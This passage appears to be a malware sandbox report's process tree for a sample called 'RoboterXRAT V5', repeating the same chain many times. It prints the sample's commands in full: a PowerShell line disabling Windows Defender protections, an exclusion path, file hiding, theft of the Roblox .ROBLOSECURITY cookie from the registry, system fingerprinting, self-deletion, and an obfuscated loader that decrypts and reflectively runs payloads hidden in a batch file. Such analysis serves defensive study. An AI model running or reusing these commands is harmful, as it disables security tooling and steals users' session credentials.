        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        
        PID:904
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        38⤵
        
        PID:7072
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        38⤵
        
        PID:6448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:3588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7004
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        38⤵
        Detects videocard installed
        
        PID:6672
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        38⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1848
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        36⤵
        
        PID:6496
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        36⤵
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        35⤵
        
        PID:5444
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        35⤵
        
        PID:1328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        33⤵
        
        PID:6396
        
        C:\Windows\system32\net.exe
        
        net file
        34⤵
        
        PID:5552
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        35⤵
        
        PID:744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6888
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        33⤵
        
        PID:7048
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        34⤵
        
        PID:6944
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        34⤵
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        34⤵
        
        PID:6596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        32⤵
        
        PID:1136
        
        C:\Windows\system32\net.exe
        
        net file
        33⤵
        
        PID:6852
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        34⤵
        
        PID:5148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        33⤵
        
        PID:6856
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        33⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        33⤵
        
        PID:6084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        31⤵
        
        PID:5568
        
        C:\Windows\system32\net.exe
        
        net file
        32⤵
        
        PID:6388
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        33⤵
        
        PID:6328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6020
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        31⤵
        
        PID:7128
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        32⤵
        
        PID:5660
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        32⤵
        
        PID:6352
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:6880
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        33⤵
        Views/modifies file attributes
        
        PID:2788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        33⤵
        
        PID:6712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        
        PID:2812
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        33⤵
        
        PID:4300
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        33⤵
        
        PID:3348
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:6888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6952
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        33⤵
        Detects videocard installed
        
        PID:5092
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6388
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        34⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        30⤵
        
        PID:7040
        
        C:\Windows\system32\net.exe
        
        net file
        31⤵
        
        PID:2824
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        32⤵
        
        PID:6356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        31⤵
        
        PID:3312
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        30⤵
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        31⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        31⤵
        
        PID:5908
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        31⤵
        
        PID:7008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        29⤵
        
        PID:1120
        
        C:\Windows\system32\net.exe
        
        net file
        30⤵
        
        PID:6320
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        31⤵
        
        PID:6332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6320
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        29⤵
        
        PID:5112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        28⤵
        
        PID:5224
        
        C:\Windows\system32\net.exe
        
        net file
        29⤵
        
        PID:3056
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        30⤵
        
        PID:5500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        29⤵
        
        PID:6292
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        29⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        30⤵
        
        PID:3616
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        30⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        30⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        29⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        29⤵
        
        PID:6344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        27⤵
        
        PID:5080
        
        C:\Windows\system32\net.exe
        
        net file
        28⤵
        
        PID:5108
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        29⤵
        
        PID:5836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        27⤵
        
        PID:3348
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:6108
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        28⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        28⤵
        
        PID:5588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        26⤵
        
        PID:772
        
        C:\Windows\system32\net.exe
        
        net file
        27⤵
        
        PID:1300
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        28⤵
        
        PID:3888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
